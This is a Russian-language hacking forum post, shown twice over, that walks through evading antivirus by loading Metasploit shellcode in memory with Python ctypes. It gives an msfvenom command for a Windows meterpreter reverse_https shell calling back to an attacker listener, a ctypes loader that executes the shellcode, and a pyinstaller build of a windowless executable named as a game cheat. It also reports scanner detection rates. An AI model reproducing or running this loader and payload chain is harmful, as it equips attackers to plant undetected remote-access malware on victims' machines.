Обход антивируса с помощью ctypes (python)
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1) Создаем шеллкод командой:
Код
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.
Дальше создаем скрипт на питоне следуещого вида:
Код
from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");
tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))
shell()
Собираем через pyinstaller на Windows системе..
Код
Хочу заметить что когда я не использовал картинку мне показало на https://nodistribute.com/ 0/35
а когда добавил иконку то 8/35. Почему пока не выяснял.
Вот без картинки
А вот с картинкой
Ну в любом случае результат не плохой. Все спасибо за внимания. Надеюсь был полезен
Просторы интернета
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1) Создаем шеллкод командой:
Код
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.
Дальше создаем скрипт на питоне следуещого вида:
Код
from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");
tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))
shell()
Собираем через pyinstaller на Windows системе..
Код
Код:
C:\Python27\Scripts\pyinstaller.exe -F --noconsole --onefile --icon=C:\Users\CorpOfHack\Desktop\contacts.ico C:\Users\CorpOfHack\Desktop\SuperCheat.py
Хочу заметить что когда я не использовал картинку мне показало на https://nodistribute.com/ 0/35
а когда добавил иконку то 8/35. Почему пока не выяснял.
Вот без картинки
А вот с картинкой
Ну в любом случае результат не плохой. Все спасибо за внимания. Надеюсь был полезен
Просторы интернета